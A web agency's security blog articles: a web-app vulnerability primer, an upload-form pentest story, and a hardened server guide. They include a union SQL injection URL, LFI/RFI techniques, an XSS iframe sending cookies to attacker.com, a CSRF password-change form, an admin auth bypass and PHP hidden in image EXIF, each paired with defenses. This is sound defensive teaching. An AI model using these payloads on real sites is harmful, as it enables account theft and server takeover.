Hello! We are MTR Design and site making is our speciality. We work with UK based startups, established businesses, media companies and creative individuals and turn their ideas into reality. This is a thrill and we totally love it.

Stayin' secure with Web Security Watch

Author: Emil Filipov


Is your server/website secure? How do you really know? I'll come back to this question in a bit.

As you may be aware, there are tons of security advisories released by multiple sources every day. That's a true wealth of valuable information flowing out on the Internet. Being aware of the issues described in these advisories could make all the difference between being safe and getting hacked; between spending a few minutes to patch up, and spending weeks recovering lost data, reputation and customer trust. So who would *not* take advantage of the public security advisories, right?

Quite a few people, as it turns out. See, there is the problem of information overload. There are a lot of sources of security information, each of them spewing out dozens of articles every single day. To make it worse, very few of those articles are actually relevant to you. So, if you do want to track them, you end up manually reviewing 99% of junk to get to the 1% that really applies to your setup. A lot of system/security administrators spend several dull hours every week going through reports that rarely concern them. Some even hire full-time dedicated operators to process the information. Others simply don't care about the advisories, because the review process is too time-consuming.

Well, we decided we can help with the major pains of the advisory monitoring process, so we built Web Security Watch (WSW) for this purpose. The website aggregates security advisories coming from multiple reputable sources (so you don't miss anything), groups them together (so you don't get multiple copies), and tags them based on the affected products/applications. The last step is particularly important, as tags allow you to filter just the items that you are interested in, e.g. "WordPress", "MySQL", "Apache". What's more, we wrote an RSS module for WordPress, so you can subscribe to an RSS feed which only contains the tags you care about. A custom security feed just for you - how cool is that? Oh, and in case you didn't notice - the site is great for security research. And it's free.

Even though WSW is quite young, it already contains more than 4500 advisories, and the number grows every day. We will continue to improve the site functionality and the tagging process, which is still a bit rough around the edges. If you have any feature requests or suggestions, we would be really happy to hear them - feel free to use the contact form to get in touch with us with anything on your mind.

Now, to return to my original question. You can't really tell whether your site/server is secure until you see it through the eyes of a hacker, and that requires some capable penetration testers. Even after you have had the perfect penetration test performed by the greatest hackers in the world, however, you may end up hacked and defaced by a script kiddie the next week, due to a vulnerability that has just been disclosed publicly.

Which brings me to the basic truth about staying secure - security is not a state, it's a process. A large part of that process is staying current with the available security information, and Web Security Watch can help you with that part.

Web Application Security Basics

Author: Dimitar Ivanov


Some History

With the development of computers and communication technologies, the question of security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for companies - you simply cannot do business if you do not use the Internet and/or web-based solutions - ERP applications, collaboration tools, you name it. This raises many questions, such as "How secure is the information of my company?"; "How secure is the information of my customers?"; "Can someone access this information without authorization?"; "What do I need to do to protect myself from getting hacked?", etc. These questions are more relevant today than they were in the past. Twenty years ago very few people used computers, and even fewer dealt with information security. For those who did, it was a hobby or a profession, and they had a different way of thinking - if they found a vulnerability in a piece of software or a system, they would report it to the owners so that they could fix or mitigate it. I remember in the 90's there was a guy who hacked the name server of our university network through the finger daemon, and reported it immediately without doing any harm.

Now, when literally everyone has Internet access, things are quite different. Anyone can download working exploits for recently published vulnerabilities; there are tools that automate most of the tasks you would go through to hack a website; and do not forget Google and Shodan, which you can use to find vulnerable targets. All this makes "hacking" (if you can call it that) very easy.

Why does Web application security matter?

Under these circumstances, it is not hard to answer this question. Since virtually anyone has access to "hacking resources", the threat to information security has increased enormously. With the migration to Web applications, combined with all the fuss around cloud computing, the focus of security specialists and researchers has shifted. On the one hand, it is harder to find a remote exploit for an operating system. On the other hand, it is much easier to target and compromise a Web application. Often, the only thing you need is a Web browser - take LFI, RFI, File Upload, or SQLi. If the application is vulnerable to LFI, you can include the process environment, which is going to be parsed by the PHP interpreter. If you set the User-Agent header to PHP code, it will be executed, giving you remote command execution. If there is an RFI, you can include a Web shell from a remote server, and so on. Additionally, vulnerabilities are announced publicly, sometimes even before there is a patch for them. Yeah, but

why on earth would someone attack my company?

Well, the motivation of the attackers can differ - industrial espionage; getting a stepping stone (hopping station) for carrying out attacks on other machines/networks; real or imaginary profit; revenge; hacktivism, etc. Anyone can target any company, even for no particular reason, so

what could be the damage?

No matter the motivation of the attacker, their actions can cause huge financial losses, loss of reputation and trust, and lawsuits. If a server is hacked and used as a hopping station to attack other networks, it may be confiscated by law enforcement, which can lead to additional losses. If its content is deleted, this can directly affect productivity. A compromise of a server can also lead to attacks on the internal networks of the company. That is why we need to know what are

the Most Common Vulnerabilities in Web Applications

The Open Web Application Security Project (OWASP) defines ten categories, which combine "the most serious risks for a broad array of organizations." Below, we will outline some of the most common vulnerabilities we have encountered in the course of our work. Probably the most common and the easiest one to exploit is

SQL Injection - Exploiting the Developer

Almost every dynamic Web application uses some kind of database backend. The content displayed to the application users is stored in the database and displayed in the browser, depending on the parameters passed by the underlying scripts to the backend. These parameters, however, depend on user behavior and can, therefore, be modified by the user. This is the basic functionality of the Web application. The problems arise when the parameters are passed to the database without any sanitizing. This allows malicious users to close the legitimate query and pass their own queries to the database, getting the results one way or another. In other words, SQL Injection exploits the assumptions made by the application developers. For example, when the developer wrote the following code:

$sql = 'SELECT *
FROM products
WHERE id = ' . $_GET['id'];

they wanted the script to query the database for products matching a given ID that is passed as a GET parameter. That is, if the visitors access http://target.com/vulnerable_script.php?id=1, they would see the details for the product with ID 1. The database query will look like this:

SELECT *
FROM products
WHERE id = 1

In this particular case, the developers assumed that the 'id' parameter would always be an integer. However, since the value of the 'id' parameter is passed to the database without any filtering, a malicious user can input the following URL in the browser: http://target.com/vulnerable_script.php?id=1+union+all+select+0,1,concat_ws(0x3a,user(),database(),version()),3,4,5,6-- In this case, the DB query will look like this:

SELECT *
FROM products
WHERE id = 1
union all
select 0,1,concat_ws(0x3A,user(),database(),version()),3,4,5,6

Basically, this tells the database to display the information about the product with ID 1 and combine it with a row that contains the database user, the name of the database and the version of the database server, separated by colons (0x3A) in the third column. To build this query, the attacker needs to know the number of columns returned by the original query. This information can be easily obtained with several requests that instruct the database to order the data by a particular column. This is a basic example of a regular Union SQL Injection.

There are other flavors of SQLi - error-based, time-based blind, and boolean-based blind. Error-based SQL Injection attacks rely on extracting information from the errors returned by the database. There is a nice introductory tutorial on error-based SQLi on Youtube. Surprisingly often, developers think that when they hide the errors from the output, they have resolved the vulnerability. Of course, this is not the case - the fact that you cannot see the data returned by the database (union-based) or the errors (error-based) does not mean that the script is not vulnerable. In these cases, an attacker can use Blind SQL Injection to exfiltrate data, i.e. brute-force it piece by piece based on boolean or time-based conditions observed in the responses of the server.

Of course, attackers and pentesters are not stuck with the browser to exploit these vulnerabilities. There are numerous tools that automate the process. The best one is sqlmap; Bernardo and Miroslav have done an amazing job developing this tool. There are several things that can be done to prevent SQL Injection. The most widely used method is

filtering the user input

This method is the easiest to implement, but if not implemented properly, it can be bypassed. There are numerous techniques to bypass defenses based on input filtering - case tampering, white space tampering, encoding of the queries. A far better defense against SQLi is to use

parameterized queries

or "prepared statements". These are essentially templates for SQL queries, which contain placeholders where the user input will go. When the filled-in template is passed to the database, the entire user input ends up in the place allocated for it, and the database executes the query defined by the template, never a query smuggled in through the input. Alternatively, developers can use an ORM.
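In PHP this idea is available through mysqli or PDO prepared statements; the mechanics are easiest to show with Python's built-in sqlite3 module. The table and values below mirror the products example from earlier and are ours, not from a real application:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'Widget')")

# Untrusted input, as it would arrive in $_GET['id']
malicious = "1 union all select 0, sqlite_version()"

# The ? placeholder is filled in by the driver itself; the input is
# treated strictly as a value, never as SQL text, so the injection
# attempt simply matches no product.
rows = conn.execute("SELECT * FROM products WHERE id = ?", (malicious,)).fetchall()

# A legitimate id still works as expected.
product = conn.execute("SELECT * FROM products WHERE id = ?", ("1",)).fetchall()
```

The union payload that succeeded against the string-concatenated query above returns an empty result here, because it is compared against the id column as one opaque value.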

ORM (Object Relational Mapping)

This is a technique that maps the tables in the database to classes and the records in them to objects, creating a virtual, object-oriented view of the database. In practice, ORM systems generate parameterized queries under the hood. The second most common vulnerability in Web applications is

File Inclusion - Exploiting the Functionality

This is another vulnerability that is fairly easy to find and exploit. Essentially, this is the ability to include files from the machine on which the application runs, or from a remote server visible to this machine. The possibility to include different scripts is essential for the work of every application - this is how the application logic is abstracted, or how different pages are displayed depending on the user's choice. Let's take a fairly simple website that has four pages: Home, News, About Us, Contacts. If the visitor accesses the Home page, the URL they use would look like this:


In other words, the script accepts one parameter (page), whose value specifies the page that is requested by the visitor. Let's assume that the script has the following code:

$page = $_GET['page'];
if(isset($page)) {
    include($page);
} else {
    include("home.php");
}
The code is self-explanatory - the value of the GET parameter 'page' is assigned to the variable $page. If its value is not NULL, the script includes the file whose name matches the value. The problem with this code is that the $page variable is created from the user input without any checks or filtering. Therefore, if we access the following URL:


the script will include and display the contents of the UNIX password file. This is a very simplified example of LFI. Often, programmers think that to secure the script above, they only need to add one little modification:

$page = $_GET['page'];
if(isset($page)) {
    include("$page" . ".html");
} else {
    include("home.php");
}

The only difference here is that a .html extension is added to the included page. However, by simply appending a null character (%00) to the URL, the attacker may still be able to include arbitrary files. This depends on the server configuration and the PHP version, and does not work in all cases. In other cases, the developers use the file_exists() function, but this is a functionality check, not a security one, because it does not limit the ability to include existing files.

LFI vulnerabilities can easily lead to command execution in some cases. To achieve this, a malicious user can use the /proc file system, which is used in Linux as an interface to the kernel of the operating system. Let's say that, again, we have a script that is vulnerable to LFI. To gain the ability to execute commands on the server, a malicious user can include /proc/self/environ. This is the environment of the current process - it contains the environment variables for the running process. Besides the system environment variables, it also contains the CGI variables (REMOTE_ADDR, HTTP_REFERER, HTTP_USER_AGENT, etc.). So, if the hacker changes the User-Agent header passed to the server to a PHP script, the script will be parsed by the PHP interpreter and executed on the server.

So far, we've looked into the ability to include files locally from the server on which the vulnerable script is running. Including files from remote locations is not that different. Actually, if the server configuration allows the inclusion of remote scripts, and if the script is vulnerable, the only difference will be in the URL - the attacker would just have to use an address, such as


The file php_shell.txt will be included by the vulnerable script, parsed by the interpreter, and executed locally on the server, effectively giving the attacker Web shell access to the machine. Much like SQL Injection vulnerabilities, File Inclusion vulnerabilities are fairly easy to find and exploit. They, too, are a result of bad programming. Another such result is the

Arbitrary File Upload or Exploiting the Hospitality

We have previously posted about this type of vulnerability, so we are going to skip the details here. The truth is that it is not just media upload forms that can be exploited. Any file upload script can be used. There may not even be an HTML form; the attackers can just make a request directly to the script. Even if we have a secure application, we should always be watching for

Unprotected Files or Exploiting the Negligence

People often make mistakes because of negligence, and developers and system administrators are no exception. With the correct Google dorks we can find numerous configuration or backup files with database connect strings, scripts with an improper content type that are downloaded instead of executed in the browser, file managers with poor or no authentication, and so on. It may sound weird, but this is a fairly common mistake. Imagine that the developer of a web application has to make a quick change on the production server. They create a backup of the script they are about to change, and then leave the backup file with a .bak extension on the server. Even if the script does not contain sensitive data, such as usernames and passwords, it still represents a security issue, because the backup file will most probably be served as plain text to whoever requests it, exposing the source code. In another scenario, the Web application may use a rich text editor, such as FCKeditor. There are lots of vulnerable versions of such editors that allow unauthenticated users to upload arbitrary files. The main reason for this security hole is the fact that people place files where they are not supposed to. To avoid this, you need to make sure that all files that should not be accessible over HTTP are placed outside the Web root directory. If for some reason this is not possible, these files should be protected properly. Probably the most common and overlooked vulnerability is

XSS or Exploiting the User

There are situations in which the Web application allows us to get to the server through its users. XSS (Cross-Site Scripting) vulnerabilities allow the attacker to inject custom scripts that are executed in the context of the browser of the webapp user. This is due to improper validation of the output. There are two kinds of XSS vulnerabilities: persistent (stored) and non-persistent (reflected). Persistent XSS attacks store the injected code on the server, and it is executed each time the page is displayed to the visitors. Here is an example scenario that uses stored XSS to get the cookie of a Web application user.

  • The attacker creates a script on their server that will collect the cookies.
  • The attacker injects the following hidden iframe in the application:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="http://attacker.com/get_cookies.php?cookie=" + document.cookie)></iframe>
  • An authenticated user loads the page that contains the iframe.
  • The cookie is sent to the script, which writes it to a file or a database.
  • The attacker loads the cookie in their browser and is able to authenticate as the user.
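The scenario above works only because the stored comment reaches other users' browsers verbatim. The core defense is encoding user-supplied data on output; here is a minimal sketch using Python's standard html module (the payload is a shortened stand-in for the iframe above):

```python
from html import escape

# A stand-in for the injected iframe from the scenario above
# (shortened; the real payload exfiltrates document.cookie).
payload = '<iframe src="javascript:alert(document.cookie)"></iframe>'

# Encoding on output turns the markup into inert text:
# the browser displays the tag instead of executing it.
safe = escape(payload, quote=True)
```

After escaping, the text can be embedded in an HTML page without being interpreted as markup; PHP offers the same encoding as htmlspecialchars().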

Non-persistent XSS attacks are essentially the same; the only difference is that the injected code is not stored on the server. Instead, the attacker needs to trick the user into following a link. Although XSS attacks usually attempt to steal cookies, this is not always the case. They may be used to target the passwords saved in the browser, and let's not forget BeEF. This means that setting the HttpOnly flag is not enough to protect the Web application users from XSS attacks. The best protection is to validate and sanitize both the input and the output of the application, along with a tightened cookie security policy. A close relative of the XSS is the

XSRF or Exploiting the Browser

In its essence, the Cross-Site Request Forgery (CSRF or XSRF) attack is a way to issue commands to the Web application on behalf of a user it trusts. Suppose we have a page in our Web application where the users can change their passwords. If the form is vulnerable to XSRF, an attacker can exploit this vulnerability to reset the password of the user. Here is how such an attack would take place:

  • The attacker creates their own form on their server:
    <body onLoad="javascript:document.password_form.submit()">
        <form action="https://target.com/admin/admin.php?" method=post name="password_form">
            <input type=hidden name=a value=change_password>
            <input type=password name=password1 VALUE="new_pass">
            <input type=password name=password2 VALUE="new_pass">
        </form>
    </body>
  • The attacker creates a seemingly empty HTML page, which contains a hidden iframe or an img tag that loads the form.
  • The attacker tricks the user into accessing the page (the user must have an active session with the Web application).
  • The form submits the data to the server, effectively changing the password.
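The forged form works because the browser attaches the victim's session cookie to the request automatically. A per-session secret that the attacker's page cannot read defeats it; here is a minimal Python sketch of the idea (the session dict is a stand-in for real server-side session storage):

```python
import hmac
import secrets

def issue_token(session):
    # One unpredictable token per session; embed it as a hidden field
    # in every form and require it on each state-changing POST.
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def verify_token(session, submitted):
    # Constant-time comparison; a cross-site page cannot read our form,
    # so it has no way to learn the token it would need to submit.
    expected = session.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(expected, submitted)

session = {}                 # stand-in for real server-side session storage
token = issue_token(session)
```

The forged password-change request from the scenario above would fail verification, since the attacker's page has no way to obtain the token.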

The only difficult part of the attack is tricking the user into visiting the page while they are logged in to the application. This may be achieved with a spoofed e-mail, an instant message, and so on. To protect users against such attacks, developers need to use anti-XSRF tokens in POST requests. Additionally, sensitive actions, such as changing a password, should require an additional confirmation - usually, entering the old password. Both XSS and CSRF attacks attempt to steal user accounts. This can also be achieved by attacking the

Authentication and Authorization or Exploiting the Implementation

We all know that assumptions are bad, but we still continue to assume. Fairly often the developers of an application make assumptions about how the authorization and the authentication of the users should work. These assumptions are sometimes wrong, and malicious users can perform actions that do not match what the developers have taken for granted. Let's take one of the most famous shopping cart scripts as an example. Here is how the administrators of the application log in to the administrative interface.

  • The administrator accesses http://target.com/catalog/admin.
  • The script redirects to the login.php script.
  • The administrator enters their login credentials.
  • The script checks the login credentials.
  • If they are correct, the administrator is logged in.
  • If they are not correct, the script asks the user for their login credentials again.

This is achieved by showing the login.php script to every unauthenticated user of the application. The login.php script contains the following code:


and here is the part of the application_top.php script that checks if the user is authenticated:

// redirect to login page if administrator is not yet logged in
if (!tep_session_is_registered('admin')) {
  $redirect = false;
  $current_page = basename($PHP_SELF);
  if ($current_page != FILENAME_LOGIN) {
    if (!tep_session_is_registered('redirect_origin')) {
      $redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS);
    }
    $redirect = true;
  }
  if ($redirect == true) {
    tep_redirect(tep_href_link(FILENAME_LOGIN));
  }
}

What it basically does is check whether the basename of $PHP_SELF is login.php. If it is, the script serves the page; otherwise, you are redirected to login.php. Now, imagine that the attacker accesses the following URL:

http://target.com/catalog/admin/file_manager.php/login.php

The basename of $PHP_SELF is login.php, so the redirect is completely bypassed and the script renders the page, which is, of course, file_manager.php.

The attacker can also make a POST request to http://target.com/catalog/admin/administrators.php/login.php?action=insert and add themselves as a site administrator, upload a Web shell, and so on, and so forth.
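The bypass hinges on how basename() treats trailing path components; Python's posixpath.basename behaves the same way as PHP's basename here and makes the flaw easy to see:

```python
import posixpath

# $PHP_SELF for a request to .../admin/file_manager.php/login.php
php_self = "/catalog/admin/file_manager.php/login.php"

# basename() keeps only the last path component, so the guard that
# compares it to FILENAME_LOGIN ('login.php') is satisfied...
last_component = posixpath.basename(php_self)

# ...even though the script the server actually executes is
# file_manager.php, with /login.php merely passed as extra path info.
```

The guard sees only the final component and happily serves a page that should have required authentication.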

Such vulnerabilities are due to mistakes in the programming. They are a bit harder to detect by the attackers, but they are extremely unpleasant, as they give access to the application to unauthenticated users.

To avoid these vulnerabilities, the logic of the application has to be very well planned, and the implementation should be thoroughly tested.

Of course, there are other vulnerabilities, and attacks that are hybrids of the ones described above. No single post can encompass them all. But we can safely say that these are the most common vulnerabilities and attacks on the Internet nowadays.

In a follow-up post we will discuss the defense and the penetration tests as part of the defense.

This article is translated to Serbo-Croatian language by Anja Skrba from Webhostinggeeks.com.

Published in: Development, Security

Poking with Media Upload Forms

Author: Dimitar Ivanov


What can I say about file upload forms? Every pentester simply loves them - the ability to upload data on the server you are testing is what you always aim for. During a recent penetration test, I had quite a lot of fun with a form that was supposed to allow registered users of the site to upload pictures and videos to their profiles. The idea behind the test was to report everything as it was found, and the developers would fix it on the fly. The usual SQL injection and XSS issues they had no problems with, but the image upload turned out to be a real challenge. When I got to the file upload form, it performed no checks whatsoever. I tried to upload a PHP shell, and a second later I was doing the happy hacker dance.

The challenge

So the developers applied the following fix:

$valid = false;
if (preg_match('/^image/', $_FILES['file']['type'])) {
    $info = getimagesize($_FILES['file']['tmp_name']);
    if (!empty($info)) {
        $valid = true;
    }
} elseif (preg_match('/^video/', $_FILES['file']['type'])) {
    $valid = true;
} else {
    @unlink($_FILES['file']['tmp_name']);
}

if ($valid) {
    move_uploaded_file(
        $_FILES['file']['tmp_name'],
        'images' . '/' . $_FILES['file']['name']
    );
}

The code now checks the type of the file and, for images, whether the file is a valid image. However, there are a few issues with this check:

  • the type of the file is checked via the Content-Type header, which is passed to the script by the client, and therefore, can be easily modified;
  • the script is not checking the file extension, and you can still upload a .php file;
  • the check for the videos is only based on the Content-Type header.


It is fairly easy to evade this kind of protection on file upload forms. The easiest thing, of course, is to upload a PHP script while changing the Content-Type header of the HTTP request to an image/* or video/* type. To do this, you need to intercept the outgoing HTTP request with a local proxy, such as Burp or WebScarab, but Tamper Data for Firefox will do just fine. You can also upload a valid image and insert PHP code in its EXIF data. To do this, you can put the code in the Comment field, e.g.:

$ exiftool -Comment='<?php phpinfo(); ?>' info.php
    1 image files updated

When you upload the image with a .php extension, it will be processed by the PHP interpreter, and the code will be executed on the server. Depending on the server configuration, you might also be able to upload the image with a .php.jpg extension. If the check for the extension is not done correctly, and if the server configuration allows it, you can still get code execution. Easy, eh?


So what can be done to prevent this? With a mixture of secure coding and some server-side tweaks, you can achieve pretty secure file upload functionality.

  • [Code] Check for the Content-Type header. This may fool some script kiddies or less-determined attackers.
  • [Code] Check for the file extension. Replace .php, .py, etc. with, say, _php, _py, etc.
  • [Server] Disable script execution in the upload directory. Even if a script is uploaded, the web server will not execute it.
  • [Server] Disable HTTP access to the upload directory if the files are only meant to be accessed by scripts through the file system. Otherwise, although an uploaded script will not be executed locally on the server, it could still be used by attackers in Remote File Inclusion attacks: if they target another server with an application that has an RFI vulnerability and allow_url_include enabled, they can upload a script to your server and use it to get a shell on the vulnerable machine.
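The code-side items above can be sketched as follows. This is an illustration under our own naming (the whitelist and helper are ours, not the developers' actual fix): only the final extension counts, it must be whitelisted, and the stored name is chosen by the server.

```python
import os
import secrets

# Hypothetical whitelist; extend it to whatever your application serves.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

def safe_upload_name(original_name):
    """Return a server-chosen file name, or None to reject the upload.

    Only the final extension is considered and it must be whitelisted.
    The stored name is random, so the original name (and any .php
    embedded in it) never reaches the disk, and collisions with
    existing files cannot occur.
    """
    ext = os.path.splitext(original_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return secrets.token_hex(16) + ext
```

Combined with the server-side tweaks (no script execution in the upload directory), even a crafted file that slips through cannot run as code.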


Developers often forget that relying on client-side controls is a bad thing. They should always code under the assumption that the application may be (ab)used by a malicious user. Everything on the client side can be controlled and, therefore, evaded. The more you check the user input, the better. And of course, the server configuration should be as hardened as possible.


Author: Dimitar Ivanov


A couple of years ago, one of our clients asked us to design a server setup that would host a PHP application for credit card storage. The application had to be accessible from different locations, but only by their employees.

Below is the design guide, produced by our team.

What we tried to do was make the security as paranoid as possible while still leaving the system in a usable state. Of course, there is always something more you can do to tighten the security, but at some point that leads to functional inconveniences which we'd rather not live with.

The principle we followed was "deny all, allow certain things." Therefore, the main design principles are:

  • Close all doors securely.
  • Open some doors.
  • Closely monitor the activity of the doors you opened.
  • Always be alert and monitor for suspicious activity of any kind (newly opened doors, unknown processes, unknown states of the system, etc)

Server installation and setup notes

  • Install a bare Linux, no services at all running ("netstat -lnp" must show no listening ports).
  • Install an intrusion detection system (which monitors system files for modifications).
  • Use the 'grsecurity' Linux kernel patches - they help against a lot of 'off-the-shelf' exploits.
  • (door #1) Install the OpenSSH server (port 22), so that you can manage the server.
    • Disallow password logins, allow ONLY public keys, SSH v2.
    • Set PermitUserEnvironment to "yes".
    • Set a "KEYHOLDER" environmental variable in the ~/.ssh/authorized_keys file.
    • Send an e-mail if the KEYHOLDER variable is not set when a shell instance is started.
  • Set up an external DNS server in "/etc/resolv.conf" for resolving.
  • (door #2) Install a web server, for example Apache.
    • Leave only the barely needed modules.
    • Set up the vhost to work only with SSL, no plain HTTP (http://httpd.apache.org/docs/2.2/ssl/ssl_howto.html).
    • Purchase an SSL certificate for the server's vhost, so that clients can validate it.
    • Do not set up multiple vhosts on the server; this server will have only one purpose - to store and send data securely; don't be tempted to assign more tasks here.
    • Install a Web Application firewall (mod_security, etc.) - it will detect common web-based attacks. Monitor its logs.
    • Limit HTTP methods to good ones only, unexpected HTTP methods should get into the error logs and raise an eyebrow (generate alerts).
    • Disable directory listing in Apache.
    • Disable multiviews/content negotiation in Apache if your app does not rely on them.
  • Install an Application Firewall (e.g. AppArmor) - apps should not try to access resources they have no (legal) business with. For example, Apache should not try to read into /root/.
  • Install a MySQL server and bind it to the loopback address ( so that remote network access isn't possible.
  • Install a mail server like Exim or Postfix but let it send only locally generated e-mails; there is no need to have a fully functional mail server, listening on the machine.
  • Firewall INPUT and FORWARD iptables chains completely (set default policy to DROP), except for the following simple rules:
    • INCOMING TCP connections TO port 22 FROM your IP address(es) - allow enough IP addresses, so that you don't lock yourself out;
    • INCOMING TCP connections TO port 443 FROM your clients' IP address(es) - the CRM application's IP address, etc.;
    • Allow INCOMING TCP, UDP and ICMP packets in state ESTABLISHED (i.e. belonging to connections the server initiated, or connections already allowed in, such as SSH).
  • Log remotely, so that if the system does get compromised, the attacker cannot completely cover their traces. Copying the log files over at designated intervals is OK-ish, but real-time remote logging (like syslog over SSL) is much better, as there is no window in which the logs could be erased or tampered with. Make an automatic checker which confirms that the remote and local logs are identical - an alarm bell should go off if they aren't.
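
The firewall rules above might be sketched roughly as follows. This is a hypothetical fragment, not a complete ruleset: the addresses and are placeholders for your management IP and a client IP, and the loopback rule is an assumption to keep localhost-bound services (MySQL, local mail) working.

```shell
# Default-deny on inbound and forwarded traffic
iptables -P INPUT DROP
iptables -P FORWARD DROP
# Loopback traffic (MySQL bound to localhost, local mail, etc.)
iptables -A INPUT -i lo -j ACCEPT
# SSH (door #1) only from your own address(es)
iptables -A INPUT -p tcp --dport 22 -s -j ACCEPT
# HTTPS (door #2) only from known client addresses
iptables -A INPUT -p tcp --dport 443 -s -j ACCEPT
# Return traffic for connections already established
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
```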

Door #1 (SSH) can be considered closed and monitored:

  • It accepts connections from only a few IP addresses.
  • It does not allow password logins, so brute-force attacks are useless.
  • A notification is sent when the door is opened without a recognized keyholder.
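
The KEYHOLDER mechanism from the setup notes could be sketched like this. The names and the alert command are assumptions; the `environment=` option in authorized_keys requires "PermitUserEnvironment yes" in sshd_config, as noted above.

```shell
# In ~/.ssh/authorized_keys, tie each public key to a person:
#   environment="KEYHOLDER=alice" ssh-rsa AAAAB3Nza(key material) alice@laptop
#
# In /etc/profile (runs for every login shell), alert on anonymous logins:
check_keyholder() {
    if [ -z "$KEYHOLDER" ]; then
        # in practice, pipe the details to mail(1) instead of echoing
        echo "ALERT: shell started without KEYHOLDER set"
    else
        echo "login by keyholder: $KEYHOLDER"
    fi
}
check_keyholder
```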

Door #2 (the web server) requires special care.

  • Review the access log of the server daily and count the requests made => if there are too many, review the log manually and see which application/user made them; start with a very low threshold and increase it over time.
  • Review the error log of the server => send a mail alert if it has new data in it.
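
The daily request-count check could look something like this. The log path and threshold are assumptions - tune them to your own traffic, starting low as suggested above.

```shell
# Alert when the number of requests in an access log exceeds a threshold.
check_request_count() {
    log="$1"; threshold="$2"
    count=$(wc -l < "$log" | tr -d ' ')   # one log line per request
    if [ "$count" -gt "$threshold" ]; then
        echo "ALERT: $count requests exceed threshold of $threshold"
    else
        echo "OK: $count requests"
    fi
}
# e.g. run daily from cron against the rotated log:
#   check_request_count /var/log/apache2/access.log 10000
```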

Consider using some kind of VPN (e.g. PPTP/IPSec/OpenVPN) as an added layer of network authentication. You can then bind the web server to the VPN IP address (so direct network access is completely disabled) and set the firewall to only allow the internal VPN IPs on port 443.
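
With a VPN in place, the binding might look like this hypothetical mod_ssl fragment - is an assumed internal VPN address, and the certificate paths are placeholders:

```apache
# Listen only on the internal VPN address, never on the public IP
SSLEngine on
    SSLCertificateFile    /etc/ssl/certs/server.crt
    SSLCertificateKeyFile /etc/ssl/private/server.key
</VirtualHost>
```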

General server activity monitoring

  • Set the mail for "root" to go to your email address (crontab and other daemons send mail to "root").
  • Review the /var/log/syslog log of the server => send a mail alert if there is new data in it.
  • Do a "ps auxww" list of the processes => if there are unknown processes (by name, running user, etc.) => send a mail alert to yourself.
  • Do a "netstat -lnp" list of the listening ports => mail alert if something changed here.
  • Test the firewall settings from an untrusted IP - the connections must be denied.
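
The "netstat -lnp" and "ps auxww" checks above boil down to comparing a trusted baseline snapshot against the current state. A minimal sketch, with assumed file paths:

```shell
# Alert whenever the current snapshot differs from the saved baseline.
check_baseline() {
    baseline="$1"; current="$2"
    if diff -q "$baseline" "$current" >/dev/null; then
        echo "OK: no changes"
    else
        echo "ALERT: listening ports changed"
        diff "$baseline" "$current" || true   # show what changed
    fi
}
# In practice, from cron:
#   netstat -lnp | sort > /tmp/ports.now
#   check_baseline /var/lib/monitor/ports.baseline /tmp/ports.now
```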

Finally, update the software on the server regularly. E-mail yourself an alert if there are new packages available for update.
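
On a Debian-style system (an assumption - adapt to your distribution), the update alert could be a cron fragment along these lines; the schedule and address are placeholders:

```shell
# /etc/cron.d/update-check - mail yourself only when updates are pending
0 7 * * * root apt-get update -qq && apt-get -s upgrade | grep '^Inst' | mail -E -s 'Pending updates' you@example.com
```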

Application Design Notes

The SSL (HTTPS) vhost will most probably run mod_php. When designing the application, the following must be taken care of:

  • Every user working with the system must be unique. Give unique login credentials to each of the employees, let them know that their actions are being monitored personally, and make clear that they must under no circumstances share their login credentials with other employees.
  • Enforce strong passwords. There are tips in the OWASP Authentication Cheat Sheet.
  • If the employees work fixed hours, any kind of login during off hours should be regarded as a highly suspicious event. For example, if employees work 9am-6pm, any successful or unsuccessful login between 6pm and 9am should trigger an alert.
  • Store all data in an encrypted form; use a strong encryption algorithm like AES-256.
  • Encrypt the data with a very long key.
  • Optional but highly recommended - do not store the key on the server. Instead, when the application is being started (for example when the server has just been rebooted), it must wait for the password to be entered. An example scenario is:
    • The application expects that the encryption key would be found in the file /dev/shm/ekey; /dev/shm is an in-memory storage location - it doesn't persist upon reboots;
    • Manually open the file /dev/shm/ekey-tmp with "cat > /dev/shm/ekey-tmp", enter the password there, then rename the file to "/dev/shm/ekey";
    • The application polls regularly for this file, reads it and then immediately deletes it;
    • Wait and verify that the file was deleted from /dev/shm.
    • Now your key is stored only in memory and is much harder for an attacker to obtain.
  • Set up the webapp to access the MySQL server through an unprivileged user restricted to a single database (*not* as MySQL's root).
  • Develop ACLs defining who can see which part of the information; split the information accordingly.
  • Every incoming GET, POST, SESSION or FILES request must be validated; do not allow bad input data.
  • Every unknown/error/bad state of the system (unable to verify input data, mysql errors, etc) must be mailed to you as a notification (do not mail details in a plain-text email, just a notification; then check it via SSH on the server).
  • Code should be clean and readable; do not over-engineer the system.
  • Make a log entry for EVERY action - both read and write ones; do NOT store any sensitive data in the logs.
  • Ensure that the application has a “safe mode” to which it can return if something truly unexpected occurs. If all else fails, log the user out and close the browser window.
  • Suppress error output when running in production mode - debug info on errors should only be sent back to the visitor in *development* mode. Once the app is deployed, debug output means leaking sensitive information.
  • Backup the data on an external server. The backup should be carried over a secure connection and kept encrypted.
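
The /dev/shm key hand-off described above could be sketched in shell like this - the file name and messages are assumptions:

```shell
# Wait for the operator to drop the key file, read it into memory,
# and delete the on-disk copy immediately.
read_ekey() {
    keyfile="$1"
    while [ ! -f "$keyfile" ]; do
        sleep 1                      # poll until the operator creates the file
    done
    EKEY=$(cat "$keyfile")           # the key now lives only in this process
    rm -f "$keyfile"                 # remove the on-disk copy at once
    echo "key loaded (${#EKEY} chars), file removed"
}
```

The operator side is exactly the manual step above: `cat > /dev/shm/ekey-tmp`, type the key, then rename the file to `/dev/shm/ekey`.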

So far so good. Up to now, we should have a system which is secure, logs everything, sends alerts and can store and retrieve sensitive data. The only question is - how do we authenticate against the system in a secure manner?

The best way to achieve this is to implement a two-factor authentication: a username/password and a client certificate.

  • Set up your own CA and issue certificates for your employees.
